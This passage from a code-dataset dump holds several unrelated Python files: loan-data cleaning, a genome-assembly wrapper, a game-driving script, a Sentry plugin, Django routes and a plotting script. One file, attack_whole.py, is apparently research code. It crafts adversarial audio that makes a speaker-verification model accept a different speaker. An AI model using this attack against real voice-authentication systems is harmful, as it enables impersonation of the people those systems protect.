= In_Df.drop('settlement_status')\nIn_Df = In_Df.drop('settlement_date')\nIn_Df = In_Df.drop('settlement_amount')\nIn_Df = In_Df.drop('settlement_percentage')\nIn_Df = In_Df.drop('settlement_term')\n\n#Hardship Flag\nIn_Df.groupBy(['hardship_flag']).agg(F.count('id')).collect() #VerySparse - Lets remove\nIn_Df.groupBy(['hardship_flag','Default_Ind']).agg(F.count('id')).collect()\n\n#Removing Hardship because it is sparse\nIn_Df = In_Df.drop('hardship_flag')\nIn_Df = In_Df.drop('hardship_type')\nIn_Df = In_Df.drop('hardship_reason')\nIn_Df = In_Df.drop('hardship_status')\nIn_Df = In_Df.drop('deferral_term')\nIn_Df = In_Df.drop('hardship_amount')\nIn_Df = In_Df.drop('hardship_start_date')\nIn_Df = In_Df.drop('hardship_end_date')\nIn_Df = 
In_Df.drop('payment_plan_start_date')\nIn_Df = In_Df.drop('hardship_length')\nIn_Df = In_Df.drop('hardship_dpd')\nIn_Df = In_Df.drop('hardship_loan_status')\nIn_Df = In_Df.drop('orig_projected_additional_accrued_interest')\nIn_Df = In_Df.drop('hardship_last_payment_amount')\nIn_Df = In_Df.drop('hardship_payoff_balance_amount')\n\nIn_Df = In_Df.drop('recoveries') #This is done after default\n\n#Drop Secondary applicant Status\nIn_Df = In_Df.drop('sec_app_fico_range_low')\nIn_Df = In_Df.drop('sec_app_fico_range_high')\nIn_Df = In_Df.drop('sec_app_earliest_cr_line')\nIn_Df = In_Df.drop('sec_app_inq_last_6mths')\nIn_Df = In_Df.drop('sec_app_mort_acc')\nIn_Df = In_Df.drop('sec_app_open_acc')\nIn_Df = In_Df.drop('sec_app_revol_util')\nIn_Df = In_Df.drop('sec_app_open_act_il')\nIn_Df = In_Df.drop('sec_app_num_rev_accts')\nIn_Df = In_Df.drop('sec_app_chargeoff_within_12_mths')\nIn_Df = In_Df.drop('sec_app_collections_12_mths_ex_med')\nIn_Df = In_Df.drop('sec_app_mths_since_last_major_derog')\n\n#Drop Joint application Variables\nIn_Df = In_Df.drop('annual_inc_joint')\nIn_Df = In_Df.drop('dti_joint')\nIn_Df = In_Df.drop('verification_status_joint')\nIn_Df = In_Df.drop('revol_bal_joint')\n\n#Drop other variables that could be considered useless\nIn_Df = In_Df.drop('title') #Too Dense to extract anything from it\n\n#These variables have an absurd number of missings - DROP!!\nIn_Df = In_Df.drop('open_acc_6m')\nIn_Df = In_Df.drop('open_act_il')\nIn_Df = In_Df.drop('open_il_12m')\nIn_Df = In_Df.drop('open_il_24m')\nIn_Df = In_Df.drop('mths_since_rcnt_il')\nIn_Df = In_Df.drop('total_bal_il')\nIn_Df = In_Df.drop('il_util')\nIn_Df = In_Df.drop('open_rv_12m')\nIn_Df = In_Df.drop('open_rv_24m')\nIn_Df = In_Df.drop('max_bal_bc')\nIn_Df = In_Df.drop('all_util')\nIn_Df = In_Df.drop('total_cu_tl')\nIn_Df = In_Df.drop('inq_last_12m')\nIn_Df = In_Df.drop('mths_since_recent_bc_dlq')\nIn_Df = In_Df.drop('mths_since_recent_revol_delinq')\n\n\n\n\n\n#Check Null values\n#In_Df.select([count(when(isnan(c) | col(c).isNull(), c)).alias(c) for c in In_Df.columns]).show()\n\n#Change character values with missings\nprint('1.5 Imputing null values')\nIn_Df = In_Df.withColumn('annual_inc',In_Df['annual_inc'].cast('float'))\nIn_Df = In_Df.withColumn('total_bal_ex_mort',In_Df['total_bal_ex_mort'].cast('float'))\nIn_Df = In_Df.withColumn('loan_amnt',In_Df['loan_amnt'].cast('float'))\nIn_Df = In_Df.withColumn('dti',In_Df['dti'].cast('float'))\nIn_Df = In_Df.withColumn('last_pymnt_amnt',In_Df['last_pymnt_amnt'].cast('float'))\nIn_Df = In_Df.withColumn('open_acc',In_Df['open_acc'].cast('int'))\nIn_Df = In_Df.withColumn('revol_bal',In_Df['revol_bal'].cast('int'))\n\n\nIn_Df = In_Df.na.fill({'emp_title':'Not-Specified'\n ,'annual_inc':In_Df.approxQuantile('annual_inc' ,[0.5] , 0)[0]\n #,'title':'Not-Specified'\n ,'addr_state':'CA'#Its the biggest state...\n ,'last_pymnt_amnt':In_Df.approxQuantile('last_pymnt_amnt' ,[0.5] , 0)[0]\n ,'collection_recovery_fee':0\n ,'inq_last_6mths':0\n ,'delinq_2yrs':0\n ,'open_acc':In_Df.approxQuantile('open_acc' ,[0.5] , 0)[0]\n ,'pub_rec':0\n ,'revol_bal':In_Df.approxQuantile('revol_bal' ,[0.5] , 0)[0]\n ,'delinq_amnt':0\n ,'disbursement_method':'Cash'\n ,'dti':In_Df.approxQuantile('dti' ,[0.5] , 0)[0]\n })\n\n#Impute\nprint('1.6 Cleaning up categorical columns')\nIn_Df.createOrReplaceTempView(\"In_Df\")\nIn_Df = sqlContext.sql(\"\"\"select *\n , coalesce(earliest_cr_line, issue_d) as earliest_cr_line_impute\n , case when purpose not in ('debt_consolidation'\n , 'credit_card'\n , 'home_improvement'\n 
, 'other'\n , 'major_purchase'\n , 'medical'\n , 'small_business'\n , 'car'\n , 'vacation'\n , 'moving'\n , 'house'\n , 'wedding'\n , 'renewable_energy'\n , 'educational'\n ) then 'other'\n else purpose\n end as purpose_clean\n \n , case when disbursement_method = 'N' then 'Cash'\n else disbursement_method\n end as disbursement_method_clean\n \n , case when tot_coll_amt is null or tot_coll_amt = 0 then 0\n else 1\n end as Secured_Ind\n \n \n from In_Df\n\"\"\")\n\n\nIn_Df = In_Df.drop('earliest_cr_line')\nIn_Df = In_Df.drop('next_pymnt_d')\nIn_Df = In_Df.drop('purpose')\nIn_Df = In_Df.drop('disbursement_method')\n\n#Create function to change date\ndef Str_2_Dte(x):\n return(datetime.strptime(x , '%d-%b-%Y'))\n\nStr_2_Dte_udf = udf(Str_2_Dte , TimestampType())\nsqlContext.udf.register('SQL_Str_2_Dte_udf', Str_2_Dte_udf)\n\n\n#Only Keep \"important\" variables - varibales that might identify a default\n#We are using last payment date to derive the default date - so remove all invalid ones\nprint('1.7 Keeping variables required for analysis')\nIn_Df.createOrReplaceTempView(\"In_Df\")\nIn_Df = sqlContext.sql(\"\"\"select\n id\n , loan_amnt\n , term\n , int_rate\n , installment\n , grade\n , sub_grade\n , emp_title\n , emp_length\n , home_ownership\n , annual_inc\n , dti\n , tot_coll_amt\n , purpose_clean\n , Secured_Ind\n , delinq_amnt\n , cast(SQL_Str_2_Dte_udf(upper(concat('01-',last_pymnt_d))) as Date) as last_pymnt_dte\n , cast(SQL_Str_2_Dte_udf(upper(concat('01-',issue_d))) as Date) as issue_dte\n , Default_Ind\n , loan_status\n from In_Df\n where last_pymnt_d is not null \n and last_pymnt_d like '%-20%'\n \"\"\")\n\n\nIn_Df.createOrReplaceTempView(\"In_Df\")\nIn_Df = sqlContext.sql(\"\"\"select\n *\n , Case when Default_Ind = 1 then Add_months(last_pymnt_dte, 1)\n end as Default_dte\n , Case when loan_status like '%Fully Paid%' then last_pymnt_dte\n end as Maturity_Dte\n \n from In_Df\n \"\"\")\n\nIn_Df = In_Df.drop('loan_status')\n\nprint('1.8 Writing Cleaned table to Hive DB')\nIn_Df.createOrReplaceTempView(\"In_Df\")\nsqlContext.sql('''create table work_db.Inp_Data as \n (select * from In_Df)''')\n#In_Df.coalesce(1).write.mode('overwrite').csv('hdfs://localhost:9000/SSP/Project/01_Cleaned_Data' , header=True)\n\n#Load to Hive Database\nsc.stop()\n","sub_path":"SSP-Deployment/Scripts/01_Clean_Up.py","file_name":"01_Clean_Up.py","file_ext":"py","file_size_in_byte":9416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"457198802","text":"# Should we include the VAD step? nope !\n# Insert differentiable fbank extraction before input to network\n# need to consider : audio length? audio clip? 
noise evaluation\n\n#Attack schema design: How to set the threshold\n# Using create_test_data in test_model.py to generate (1A, 1P, 100N)\n# Select one negative audio as source audio\n# first evaluate to get the optimum eer and threshold, then adding noise to surpass this threshold\nimport matlab\nimport matlab.engine\nimport numpy as np\nimport librosa\nimport keras\nimport sys\nsys.path.append('../speakerVerificationSystem/')\nimport tensorflow as tf\nimport constants as c\nimport keras.backend as K\nimport pandas as pd\nimport soundfile\nimport glob\n\nfrom models import my_convolutional_model\nfrom eval_metrics import evaluate\n#from test_model import create_test_data\nfrom attack_utils import cosineDistanceLoss, cal_snr, load_wavs, cal_audiospec\n\nDEBUG = 0\nclass Attack():\n def __init__(self, checkpoint_path, step_size = 0.01, num_steps = 200, wav_dir = c.ATTACK_WAV_DIR, \n output_dir = './adversarial/', embedding_dir = '../data/embeddings/', log_file = './output.log'):\n self.step_size = step_size\n self.num_steps = num_steps \n self.checkpoint_path = checkpoint_path\n self.optimizer = keras.optimizers.Adam(lr = step_size)\n self.print_steps = self.num_steps / 20\n self.output_dir = output_dir\n self.dataset_dir = wav_dir\n self.embedding_dir = embedding_dir\n self.log_file = log_file\n # Load model in intialization\n \n input_shape = (25840, )\n #IF debug == 1\n #self.threshold_plh = K.backend.placeholder(shape=(1, 160, 257), name='threshold_plh')\n threshold_input_shape = ( 160, 257)\n # The spectrogram's shape of orignal audio\n ori_spec_shape = (160, 257)\n model = my_convolutional_model(input_shape, threshold_input_shape, ori_spec_shape, batch_size = 1, num_frames = 160)\n #4. Load layers weigths by name\n model.load_weights(self.checkpoint_path, by_name = True)\n\n for layer in model.layers[3:]:\n layer.trainable = False\n \n # Ensure trainable variables\n model.layers[1].trainable = True\n model.layers[3].trainable = True\n# print(model.layers)\n my_loss = cosineDistanceLoss() \n \n model.compile(optimizer = self.optimizer, loss = my_loss, metrics= ['accuracy'])\n self.model = model\n \n \n def calculate_sim(self, target_speaker_model, positive_embedding, neg_embeddings):\n anchor = np.tile(target_speaker_model, (neg_embeddings.shape[0] + 1, 1))\n pos_neg_embeddings = np.concatenate((positive_embedding, neg_embeddings), axis = 0)\n mul = np.multiply(anchor, pos_neg_embeddings)\n sim = np.sum(mul, axis = 1)\n #print(sim)\n return sim\n\n def find_threshold_for_target(self, target_speaker, num_pos = 1, num_neg = 30):\n # The goal of this function is to extract several batches of samples like (5AN, 1P, 30N)\n # Enroll with 5AN\n # Build threshold using (embedding, 1P, 29N)\n # Some noise is added to the last negative utterance for attack\n dataset_dir = self.dataset_dir\n vox = load_wavs(dataset_dir)\n unique_speakers = sorted(list(vox['speaker_id'].unique()))\n np.random.shuffle(unique_speakers)\n\n #print(\"attack for speaker {}\".format(unique_speakers[ii]))\n positive_files = vox[vox['speaker_id'] == target_speaker]\n\n #We need at least num_anc + num_pos audios from on speaker\n positive_file = positive_files.sample(num_pos, replace=False)\n negative_files = vox[vox['speaker_id'] != target_speaker].sample(n=num_neg, replace=False)\n\n _rd_threshold = np.random.rand(1, 160, 257)\n _rd_ori_audiospec = np.random.rand(1, 160, 257)\n\n target_speaker_model = np.load(self.embedding_dir + target_speaker + '.npy')\n #get the threshold\n positive_audio,fs = 
librosa.load(positive_files[0:1]['wav'].values[0], c.SAMPLE_RATE)\n positive_audio = np.reshape(positive_audio, (1,25840))\n positive_embedding = self.model.predict_on_batch([positive_audio, _rd_threshold, _rd_ori_audiospec])\n neg_embeddings = []\n for i in range(num_neg):\n audio,fs = librosa.load(negative_files[i:i+1]['wav'].values[0], c.SAMPLE_RATE)\n audio = np.reshape(audio, (1, 25840))\n embedding = self.model.predict_on_batch([audio, _rd_threshold, _rd_ori_audiospec])\n embedding = np.reshape(embedding, (1, 512))\n neg_embeddings.append(embedding)\n neg_embeddings = np.asarray(neg_embeddings)\n neg_embeddings = np.reshape(neg_embeddings, (num_neg, 512))\n # calculate similarity between anchor and positive, negative embeddings\n y_pred = self.calculate_sim(target_speaker_model, positive_embedding, neg_embeddings)\n y_true = np.hstack(([1] * num_pos, np.zeros( num_neg )))\n fm, tpr, acc, eer, threshold = evaluate(y_pred, y_true)\n print(\"fm {}; tpr {}; acc{}; eer {}; threshold {}\".format(fm, tpr, acc, eer, threshold))\n return threshold\n #target_threshold = 0.75\n #success_cnt += self.attack_simple(source_wav, path_to_save, target_speaker_model, target_threshold)\n #break\n #if (DEBUG == 1):\n # break\n #print(\"success rate\", success_cnt, 40)\n def attack_simple(self, source_wav, target_speaker, path_to_save, target_threshold, target_phrase):\n f = open(self.log_file, 'a+')\n success = 0\n #source_wav = self.dataset_dir + source_wav\n\n #0. load target speaker embedding\n target_embedding_vector = np.load(self.embedding_dir + target_speaker + '_' + target_phrase + '.npy')\n target_embedding_vector = np.reshape(target_embedding_vector, (1, 512))\n #1. First load audio\n original_audio,fs = librosa.load(source_wav, c.SAMPLE_RATE)\n assert(fs == 16000)\n original_audio = np.reshape(original_audio, (1, len(original_audio)))\n #print(original_audio.shape[1])\n output_wav = np.zeros((1,1))\n noise = np.zeros((1,1))\n for index in range(0, original_audio.shape[1], 25840):\n cliped_audio = original_audio[:, index: min(index+25840, original_audio.shape[1])]\n #cliped_audio = np.reshape(cliped_audio, (1,cliped_audio.shape[1]))\n #print(cliped_audio.shape)\n ori_audiospec = np.random.rand(1,160,257)\n _rd_threshold = np.random.rand(1, 160, 257)\n #perturbation = np.zeros((1, 25840),dtype='float32')\n perturbation = np.random.rand(1, 25840) * 1e-3\n if cliped_audio.shape[1] != 25840:\n output_wav = np.column_stack((output_wav, cliped_audio))\n noise = np.column_stack((noise, np.zeros((1, cliped_audio.shape[1]) )))\n continue\n \n \n zero_weights = np.zeros((25840,))\n self.model.layers[1].set_weights([zero_weights])\n new_audio = cliped_audio + perturbation\n \n steps_token = self.num_steps\n success = 0\n for i in range(self.num_steps):\n loss,_ = self.model.train_on_batch([new_audio, _rd_threshold, ori_audiospec ], target_embedding_vector)\n\n perturbation += self.step_size * (self.model.layers[1].get_weights()[0])\n \n self.model.layers[1].set_weights([zero_weights])\n new_audio = cliped_audio + perturbation\n \n \n if (loss < 1 - target_threshold):\n print(\"success! 
at step {} with loss {}\\n\".format(i, loss))\n success = 1\n steps_token = i\n break\n if (i % self.print_steps == 0): \n print(\"clip {} step {} loss {} perturbation [max] {} [min] {} [avg] {}\".format(index, i,loss, np.max(perturbation), np.min(perturbation), np.mean(perturbation)))\n f.write(path_to_save + ' ' + str(index) + ' ' + str(steps_token) + ' ' + str(loss) + ' ' + str(success) + '\\n')\n #output_wav.append(new_audio)\n output_wav = np.column_stack((output_wav, new_audio))\n noise = np.column_stack((noise, perturbation))\n #if DEBUG == 1:\n # break\n # save the adversarial audio\n output_wav = output_wav[:,1:]\n output_wav = np.array(output_wav)\n #print(output_wav)\n noise = noise[:, 1:]\n noise = np.asarray(noise)\n adversarial_audio = np.reshape(output_wav, (original_audio.shape[1], 1))\n noise = np.reshape(noise, (original_audio.shape[1], 1))\n #cal snr\n snr = cal_snr(original_audio, noise)\n print('snr', snr)\n f.write(str(snr) + '\\n')\n #if (DEBUG != 1):\n soundfile.write(path_to_save, adversarial_audio, c.SAMPLE_RATE, subtype='PCM_16')\n print(\"save to\", path_to_save)\n \n f.close()\n return success\nif __name__ == '__main__':\n #parser = argparse.ArgumentParser(description = \"Attack [target] audio with a [source] audio\")\n #parser.add_argument('--target_audio', dest= 'target_audio', type=str, help=\"target audio name\", required=True)\n #parser.add_argument('--source_audio', dest= 'source_audio', type=str, help=\"source audio name\", required=True)\n #parser.add_argument('--adv_audio_path', dest= 'adv_audio_path', type=str, help=\"output path for adversarial audio\", required=True)\n \n #read attack trails from the metadata, in a format [source ,target, adv_path]\n #parser.add_argument('--num_steps', dest= 'num_steps', type=int, default = 100, help=\"num_steps\")\n #args = parser.parse_args()\n #Need to enroll and get the embeddings for the target speakers\n\n checkpoint_path = '../speakerVerificationSystem/checkpoints/model_17200_0.54980.h5'\n output_dir = '../data/adversarial_msasv/'\n log_file = './output_threshold_msasv.log'\n attack = Attack(checkpoint_path, step_size = 0.01, num_steps = 400, wav_dir = c.ATTACK_WAV_DIR, \n output_dir = output_dir, embedding_dir = '../data/embeddings/', log_file = log_file)\n meta_file = './trials_msasv.txt'\n \n f = open(meta_file)\n for line in f.readlines():\n arr = line.strip().split(' ')\n source_audio = arr[0]\n #target_phrase = source_audio.split('/')[-1].split('_')[1]\n target_phrase = 'ph'\n target_speaker = arr[1]\n adv_path = output_dir + source_audio.split('/')[-1].split('.')[0] + '_' + target_speaker + '.wav'\n \n #threshold = attack.find_threshold_for_target(target_speaker)\n threshold = 0.8\n print(source_audio, target_speaker, adv_path, threshold)\n attack.attack_simple(source_audio, target_speaker, adv_path, target_threshold = threshold, target_phrase=target_phrase)","sub_path":"white-box-attack/attack_whole.py","file_name":"attack_whole.py","file_ext":"py","file_size_in_byte":10975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"295517605","text":"\"\"\"\nsentry.plugins.bases.tag\n~~~~~~~~~~~~~~~~~~~~~~~~\n\n:copyright: (c) 2010-2012 by the Sentry Team, see AUTHORS for more details.\n:license: BSD, see LICENSE for more details.\n\"\"\"\nfrom sentry import app\nfrom sentry.models import FilterValue, MessageFilterValue\nfrom sentry.plugins import Plugin\nfrom django.db.models import Sum\n\n\nclass TagPlugin(Plugin):\n tag = None\n tag_label = None\n 
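# templates rendered by view() and widget() below\n    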
index_template = 'sentry/plugins/bases/tag/index.html'\n widget_template = 'sentry/plugins/bases/tag/widget.html'\n\n def get_tag_values(self, event):\n \"\"\"\n Must return a list of values.\n\n >>> get_tag_pairs(event)\n [tag1, tag2, tag3]\n \"\"\"\n raise NotImplementedError\n\n def get_unique_tags(self, group):\n return group.messagefiltervalue_set.filter(\n key=self.tag,\n ).values_list(\n 'value',\n ).annotate(\n times_seen=Sum('times_seen'),\n ).values_list(\n 'value',\n 'times_seen',\n 'first_seen',\n 'last_seen',\n ).order_by('-times_seen')\n\n def panels(self, request, group, panel_list, **kwargs):\n panel_list.append((self.get_title(), self.get_url(group)))\n return panel_list\n\n def view(self, request, group, **kwargs):\n return self.render(self.index_template, {\n 'title': self.get_title(),\n 'tag_label': self.tag_label,\n 'tag_name': self.tag,\n 'unique_tags': self.get_unique_tags(group),\n 'group': group,\n })\n\n def widget(self, request, group, **kwargs):\n return self.render(self.widget_template, {\n 'title': self.get_title(),\n 'tag_label': self.tag_label,\n 'tag_name': self.tag,\n 'unique_tags': list(self.get_unique_tags(group)[:10]),\n 'group': group,\n })\n\n def post_process(self, group, event, is_new, is_sample, **kwargs):\n for value in self.get_tag_values(event):\n FilterValue.objects.get_or_create(\n project=group.project,\n key=self.tag,\n value=value,\n )\n\n app.buffer.incr(MessageFilterValue, {\n 'times_seen': 1,\n }, {\n 'group': group,\n 'project': group.project,\n 'key': self.tag,\n 'value': value,\n }, {\n 'last_seen': group.last_seen,\n })\n","sub_path":"src/sentry/plugins/bases/tag.py","file_name":"tag.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"577008925","text":"import os\nimport sys\nimport subprocess\nfrom Bio import SeqIO\nimport argparse\n\n\ndef run_spades(sw_path, r1, r2, threads, output):\n \"\"\"\n Function that run spades on a set of reads\n\n :param sw_path: Path to Spades\n :param r1: Forward read\n :param r2: Reverse read\n :param threads: Number of threads to use\n :param output: Output folder\n :return:\n \"\"\"\n\n try:\n subprocess.call([sw_path, \"-1\", r1, \"-2\", r2, \"-t\", threads, \"-o\", output, \"--careful\", \"--cov-cutoff\", \"auto\"])\n\n except OSError as e:\n if e.errno == os.errno.ENOENT:\n sys.exit(\"Spades path not found\")\n else:\n sys.exit(\"Error with the input files\")\n\ndef rename_contigs(prefix):\n \"\"\"\n Function used to rename the contigs generated by Spades (NODEXX), with the name\n of the genome or project\n :param prefix: Prefix to use for the genome\n :return:\n \"\"\"\n\n contig_file = prefix + \"/contigs.fasta\"\n output_file = prefix + \"/\" + prefix + \".fasta\"\n renamed_contig_info = []\n contig_table = []\n\n # Id counter\n count = 1\n\n for record in SeqIO.parse(open(contig_file, 'r'), \"fasta\"):\n coverage = float(record.id.split(\"_\")[5])\n length = len(record.seq)\n\n # replace the name\n new_name = prefix + \"_\" + str(count)\n record.id = new_name\n record.name = ''\n record.description = ''\n\n # Store the information\n contig_table.append([new_name, str(coverage), str(length)])\n\n renamed_contig_info.append(record)\n count += 1\n\n SeqIO.write(renamed_contig_info, open(output_file, 'w'), \"fasta\")\n\n output_table = open(prefix + \"/\" + prefix + \".tab\", 'w')\n\n for entry in contig_table:\n output_table.write(\"\\t\".join(entry) + \"\\n\")\n\n output_table.close()\n 
contig_count = len(contig_table)\n assembly_size = sum([int(i[2]) for i in contig_table])\n\n average_coverage = sum([float(i[1]) for i in contig_table]) / contig_count\n\n return contig_count, assembly_size, average_coverage\n\n# _______________\n\nprogram_description = \"Script useful to assemble multiple genomes using Spades. The parameters used within the script\" \\\n \"are:\" \\\n \"--cov-cutoff auto\" \\\n \"--careful\" \\\n \"\" \\\n \"The user needs to provide the number of threads to use.\" \\\n \"\" \\\n \"Also, this script will replace the default name of the contigs in Spades (nodeXXX), with the\"\\\n \"names of the genomes (GenomeXXX)\"\\\n\nparser = argparse.ArgumentParser(description=program_description)\nparser.add_argument(\"-i\", \"--input_list\", type=str, required=True,\n help=\"Table with the genomes to assemble. This is a table with 3 columns. The first is the genome\"\n \"prefix to use. The second is the path forward read, the third is the path to the reverse read\")\n\nparser.add_argument(\"-s\", \"--spades_version\", type=str, required=True, help=\"Path to SPades.py\")\nparser.add_argument(\"-c\", \"--cpu\", type=str, required=True, help=\"Number of threads to use\")\nargs = parser.parse_args()\n\n\n# Open the list and start running Spades\n\nreport_file = open(\"assembly_report.txt\", 'w')\n\nfor line in open(args.input_list, 'r'):\n line = line.rstrip()\n\n genome_name, forward, reverse = line.split(\"\\t\")\n\n run_spades(args.spades_version, forward, reverse, args.cpu, genome_name)\n\n total_contigs, size, avg_coverage = rename_contigs(genome_name)\n\n report_output = [genome_name, str(total_contigs), str(size), str(avg_coverage)]\n report_file.write(\"\\t\".join(report_output) + \"\\n\")\n\nreport_file.close()\n","sub_path":"Assembly/Run_SpadesMultipleGenomes.py","file_name":"Run_SpadesMultipleGenomes.py","file_ext":"py","file_size_in_byte":3704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"149189863","text":"import requests\nimport time\nimport keras\nfrom keras.models import load_model\nimport cv2\nimport numpy as np\nfrom PIL import Image\nimport pandas as pd\nfrom keras.utils import np_utils\nfrom keras.preprocessing import image\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom directkeys import PressKey, ReleaseKey, W, A, S, D\nfrom mss import mss\n\nmodel = load_model('model.h5')\nmonitor = {'top': 0, 'left': 0, 'width': 1100, 'height': 820}\n\nscalefactorvertical = 0.39024\nscalefactorhorizontal = 0.38818\n\ndef execute():\n current = get_steer_wheel()\n aim = predict_steer_wheel()\n if (current < aim - 0.02):\n PressKey(A)\n ReleaseKey(D)\n print(\"%s < %s\" % (current, aim))\n elif (current > aim + 0.02):\n PressKey(D)\n ReleaseKey(A)\n print(\"%s > %s\" % (current, aim))\n else:\n ReleaseKey(A)\n ReleaseKey(D)\n print(\"%s ~= %s\" % (current, aim))\n\ndef get_steer_wheel():\n r = requests.get('http://192.168.0.227:25555/api/ets2/telemetry')\n r = r.json()\n return r['truck']['gameSteer'] \n\ndef is_game_paused():\n r = requests.get('http://192.168.0.227:25555/api/ets2/telemetry')\n r = r.json()\n return r['game']['paused'] \n\ndef predict_steer_wheel():\n global model, scalefactorvertical, scalefactorhorizontal\n with mss() as sct:\n sct_img = sct.grab(monitor)\n img = Image.frombytes('RGB', sct_img.size, sct_img.rgb) \n img = img_to_arr(img)\n img = normalize(img) \n img = cv2.resize(img, None, fx=scalefactorhorizontal, fy=scalefactorvertical, interpolation=cv2.INTER_AREA)\n 
return model.predict(np.array([img]))\n\ndef img_to_arr(img):\n    img = image.img_to_array(img)\n    return img\n\ndef normalize(img):\n    img[:,:,0] -= 94.9449\n    img[:,:,0] /= 58.6121\n\n    img[:,:,1] -= 103.599\n    img[:,:,1] /= 61.6239\n\n    img[:,:,2] -= 92.9077\n    img[:,:,2] /= 68.66\n    return img\n\ndef get_speed():\n    r = requests.get('http://192.168.0.228:25555/api/ets2/telemetry')\n    r = r.json()\n    return r['truck']['speed'] \n\n\nwhile is_game_paused():\n    time.sleep(0.2)\n\nwhile is_game_paused() == False:\n    execute() \n    #if(get_speed() <= 20):\n    #    PressKey(W)\n    #else:\n    #    ReleaseKey(W)\n    time.sleep(0.1)\n\nReleaseKey(W)\n\n","sub_path":"kappa/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"113154637","text":"\"\"\"bbs URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n    https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n    1. Add an import: from my_app import views\n    2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n    1. Add an import: from other_app.views import Home\n    2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n    1. Import the include() function: from django.conf.urls import url, include\n    2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url,include\nfrom django.contrib import admin\nfrom blog import views\n\nurlpatterns = [\n    url(r'^admin/', admin.site.urls),\n    # Login, logout, verification code\n    url(r'^login/', views.login),\n    url(r'^logout/', views.logout),\n    url(r'^v-code/', views.v_code),\n\n    # Slider captcha verification\n    url(r'^slide-login/', views.slide_login),\n    url(r'^pcgetcaptcha/', views.pcgetcaptcha),\n\n\n    url(r'^index/', views.index),\n    # Registration\n    url(r'^register/', views.register),\n\n\n    url(r'^test/', views.test),\n\n    url(r'^blog/', include('blog.urls')),\n\n    # Upvote\n    url(r'^updown/', views.updown),\n\n]\n","sub_path":"bbs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"129530100","text":"#!/usr/bin/env python\n__author__ = \"Pedro Heleno Isolani\"\n__copyright__ = \"Copyright 2018, The SDN WiFi MAC Manager\"\n__license__ = \"GPL\"\n__version__ = \"1.0\"\n__maintainer__ = \"Pedro Heleno Isolani\"\n__email__ = \"pedro.isolani@uantwerpen.be\"\n__status__ = \"Prototype\"\n\n\" Python script for making graphs with CSV output\"\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\n\n\ndef make_graph(experiment_path, filename):\n\n    # Applying Seaborn style\n    # whitegrid, darkgrid, whitegrid, dark, white, and ticks\n    sns.set(style=\"whitegrid\", font_scale=1.5, font='Times New Roman')\n\n    # Reading ICMP CSV results\n    icmp_data_dict = read_icmp_results(experiment_path=experiment_path,\n                                       filename=filename)\n\n    #print(icmp_data_dict)\n    fig, host = plt.subplots(figsize=(10, 3.4), dpi=144)\n\n    #ax1 = plt.subplot(311)\n    #plt.setp(host.get_xticklabels())\n\n    # Adjust x Axis\n    plt.tight_layout()\n\n    p1, = host.plot(icmp_data_dict['x_axis']['values'], icmp_data_dict['y_axis']['values'], 'b-', marker=\"d\",\n                    markevery=1, markersize=10, mfc='none', markeredgewidth=2,\n                    label=\"Single Slice\")\n    p2, = host.plot(icmp_data_dict['x_axis']['values'], icmp_data_dict['y1_axis']['values'], \"-y\", marker=\"x\",\n                    markevery=1, markersize=10, mfc='none', 
markeredgewidth=2, #linewidth=3.5,\n label=\"Static Slices\")\n p3, = host.plot(icmp_data_dict['x_axis']['values'], icmp_data_dict['y2_axis']['values'], \"-g\", marker=\"o\",\n markevery=1, markersize=10, mfc='none', markeredgewidth=2, #linewidth=2.0,\n label=\"Adaptive Slices\")\n\n axis_padding = 0.4 # percentage\n host.set_xlim(min(icmp_data_dict['x_axis']['values']),\n max(icmp_data_dict['x_axis']['values']))\n host.set_ylim(0,\n max(icmp_data_dict['y_axis']['values']+icmp_data_dict['y1_axis']['values']) +\n (max(icmp_data_dict['y_axis']['values']+icmp_data_dict['y1_axis']['values'])*axis_padding))\n\n host.set_xlabel(\"Time (sec)\")\n host.set_ylabel(\"Latency (ms)\")\n\n lines = [p1, p2, p3]\n\n #plt.title(\"TESTE\")\n plt.legend(lines, [l.get_label() for l in lines], loc='upper center', bbox_to_anchor=(0.5, 1.00), ncol=3) #shadow=True)\n plt.savefig(experiment_path + 'latency_results.pdf', format=\"pdf\")\n\n plt.show()\n print('Done!')\n\n\ndef read_icmp_results(experiment_path, filename):\n data_dict = {'x_axis': {'label': '', 'values': []},\n 'y_axis': {'label': '', 'values': []},\n 'y1_axis': {'label': '', 'values': []},\n 'y2_axis': {'label': '', 'values': []}}\n\n df = pd.read_csv(experiment_path + filename, sep=',', header=0)\n header_names = {'x_axis': 'Time (sec)',\n 'y_axis': 'Single Slice Latency (ms)',\n 'y1_axis': 'Static Slices Latency (ms)',\n 'y2_axis': 'Adaptive Slices Latency (ms)'}\n\n # Populating with the header fields\n for header_value in df.columns.values:\n for key, value in header_names.items():\n if value in header_value:\n data_dict[key]['label'] = header_value\n data_dict[key]['values'] = []\n\n # Populating with the values\n for index, row in df.iterrows():\n for key, value in data_dict.items():\n data_dict[key]['values'].append(row[value['label']])\n\n return data_dict\n\n\nmake_graph(experiment_path=\"/Users/phisolani/Github/wifi_monitoring/graphs/sdn_based_slicing/latency_results/\",\n filename=\"latency_overall_plot.csv\")\n\n","sub_path":"graphs/sdn_based_slicing/median_latency_plot.py","file_name":"median_latency_plot.py","file_ext":"py","file_size_in_byte":3636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"629334992","text":"#Jiajie 